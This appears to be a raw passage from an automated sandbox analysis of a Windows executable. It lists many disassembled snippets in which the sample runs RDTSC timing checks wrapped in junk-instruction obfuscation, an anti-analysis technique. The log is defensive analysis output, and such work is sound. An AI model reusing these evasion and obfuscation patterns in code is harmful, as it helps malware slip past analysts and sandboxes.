Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CC36E8 second address: CC36EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D15978 second address: D1597C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D1597C second address: D15995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7620C9DE4Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D15995 second address: D15A12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov ebx, dword ptr [ebp+122D1D06h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F7620BAC878h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a xor bx, C673h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F7620BAC878h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b sub dword ptr [ebp+1244B223h], ebx 0x00000051 jmp 00007F7620BAC87Eh 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007F7620BAC87Dh 0x0000005f push eax 0x00000060 pop eax 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D16961 second address: D16965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D15C25 second address: D15C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnl 00007F7620BAC876h 0x0000000f jng 00007F7620BAC876h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D16965 second address: D169C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F7620C9DE48h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 and edi, dword ptr [ebp+122D3B85h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F7620C9DE48h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 movzx edi, si 0x0000004b push eax 0x0000004c push edi 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 pop edi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D18AAE second address: D18AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC87Dh 0x00000009 popad 0x0000000a push edx 0x0000000b ja 00007F7620BAC876h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 jo 00007F7620BAC876h 0x0000001e pop ecx 0x0000001f jmp 00007F7620BAC87Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D16B26 second address: D16B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE59h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D18AE1 second address: D18AE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D18AE6 second address: D18AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push esi 0x00000008 jng 00007F7620C9DE46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D16B43 second address: D16B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D19116 second address: D1918A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a je 00007F7620C9DE46h 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 nop 0x00000013 call 00007F7620C9DE57h 0x00000018 mov edi, ecx 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F7620C9DE48h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 stc 0x00000038 push 00000000h 0x0000003a pushad 0x0000003b movzx ecx, ax 0x0000003e popad 0x0000003f push eax 0x00000040 pushad 0x00000041 push edi 0x00000042 pushad 0x00000043 popad 0x00000044 pop edi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F7620C9DE57h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D192DC second address: D192E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D192E2 second address: D19376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F7620C9DE48h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 pushad 0x00000035 mov dx, AFF6h 0x00000039 popad 0x0000003a mov eax, dword ptr [ebp+122D0E35h] 0x00000040 add di, B244h 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push edx 0x0000004a call 00007F7620C9DE48h 0x0000004f pop edx 0x00000050 mov dword ptr [esp+04h], edx 0x00000054 add dword ptr [esp+04h], 0000001Dh 0x0000005c inc edx 0x0000005d push edx 0x0000005e ret 0x0000005f pop edx 0x00000060 ret 0x00000061 add dword ptr [ebp+122D19FAh], esi 0x00000067 nop 0x00000068 jmp 00007F7620C9DE4Ch 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push edi 0x00000071 pushad 0x00000072 popad 0x00000073 pop edi 0x00000074 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1A256 second address: D1A25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1AFC5 second address: D1AFCE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1A25A second address: D1A260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1AFCE second address: D1AFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1A260 second address: D1A27D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7620BAC876h 0x00000009 jnc 00007F7620BAC876h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F7620BAC878h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1AFDB second address: D1AFE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1A27D second address: D1A283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1AFE0 second address: D1B061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE57h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F7620C9DE56h 0x00000012 jmp 00007F7620C9DE59h 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F7620C9DE48h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 push ebx 0x00000035 pop edi 0x00000036 push 00000000h 0x00000038 or di, 1123h 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 push edx 0x00000044 pop edx 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1A283 second address: D1A287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1B061 second address: D1B06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1D0CF second address: D1D116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620BAC87Bh 0x00000008 jmp 00007F7620BAC888h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 jmp 00007F7620BAC887h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1D116 second address: D1D1B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub ebx, dword ptr [ebp+122D3B39h] 0x00000010 jnl 00007F7620C9DE4Ch 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F7620C9DE48h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D2C69h], edi 0x00000038 jmp 00007F7620C9DE4Eh 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007F7620C9DE48h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 00000016h 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 mov edi, dword ptr [ebp+122D1C51h] 0x0000005f xchg eax, esi 0x00000060 jp 00007F7620C9DE4Ah 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 ja 00007F7620C9DE48h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1B1AE second address: D1B22D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7620BAC878h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007F7620BAC87Eh 0x00000011 nop 0x00000012 call 00007F7620BAC889h 0x00000017 xor dword ptr [ebp+1245D8E5h], eax 0x0000001d pop edi 0x0000001e push dword ptr fs:[00000000h] 0x00000025 jne 00007F7620BAC87Ch 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 add edi, 28A6EFEAh 0x00000038 mov edi, ecx 0x0000003a mov eax, dword ptr [ebp+122D131Dh] 0x00000040 jl 00007F7620BAC884h 0x00000046 jmp 00007F7620BAC87Eh 0x0000004b push FFFFFFFFh 0x0000004d push eax 0x0000004e pushad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1E2B1 second address: D1E2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE53h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1E352 second address: D1E356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1D356 second address: D1D400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F7620C9DE4Ch 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F7620C9DE4Eh 0x00000012 nop 0x00000013 cmc 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov ebx, dword ptr [ebp+122D3BF5h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F7620C9DE48h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 jmp 00007F7620C9DE59h 0x00000047 push esi 0x00000048 and edi, 0A9424CEh 0x0000004e pop ebx 0x0000004f mov eax, dword ptr [ebp+122D0E21h] 0x00000055 mov bx, ax 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push ecx 0x0000005d call 00007F7620C9DE48h 0x00000062 pop ecx 0x00000063 mov dword ptr [esp+04h], ecx 0x00000067 add dword ptr [esp+04h], 00000019h 0x0000006f inc ecx 0x00000070 push ecx 0x00000071 ret 0x00000072 pop ecx 0x00000073 ret 0x00000074 mov edi, ebx 0x00000076 push eax 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1D400 second address: D1D404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D20430 second address: D20434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D20434 second address: D2044B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7620BAC87Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2044B second address: D204A0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7620C9DE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D188Eh], edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F7620C9DE48h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov edi, ebx 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 jo 00007F7620C9DE48h 0x0000003a pushad 0x0000003b popad 0x0000003c jmp 00007F7620C9DE4Bh 0x00000041 popad 0x00000042 push eax 0x00000043 push edi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1E4B4 second address: D1E4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D20609 second address: D2060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D233E9 second address: D233ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2257E second address: D225B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620C9DE51h 0x00000008 jmp 00007F7620C9DE59h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D225B4 second address: D225BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D225BA second address: D225BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2346B second address: D23470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D23470 second address: D23489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE55h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D243F6 second address: D243FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D243FA second address: D24404 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D235AF second address: D235B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D23680 second address: D2368F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D28A2B second address: D28A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D255E6 second address: D255EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2FED4 second address: D2FEDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2F675 second address: D2F6A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE56h 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jp 00007F7620C9DE46h 0x00000018 push esi 0x00000019 pop esi 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2F6A5 second address: D2F6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2F6A9 second address: D2F6BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7620C9DE46h 0x00000008 jmp 00007F7620C9DE4Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2F6BE second address: D2F6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2F997 second address: D2F9AA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7620C9DE46h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2FAD8 second address: D2FADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2FADC second address: D2FAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2FAE2 second address: D2FB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F7620BAC87Ah 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 popad 0x00000011 jnp 00007F7620BAC884h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D353B2 second address: D353F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jne 00007F7620C9DE4Eh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 ja 00007F7620C9DE58h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jng 00007F7620C9DE46h 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D376E5 second address: D37717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC886h 0x00000007 pushad 0x00000008 jmp 00007F7620BAC887h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D37717 second address: D3771D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3D8E2 second address: D3D8E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3D8E8 second address: D3D8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7620C9DE4Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3D8FB second address: D3D905 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7620BAC876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3D905 second address: D3D90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3D90E second address: D3D914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3DA40 second address: D3DA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3DA46 second address: D3DA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7620BAC87Fh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3DA5E second address: D3DA71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3E047 second address: D3E051 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7620BAC876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
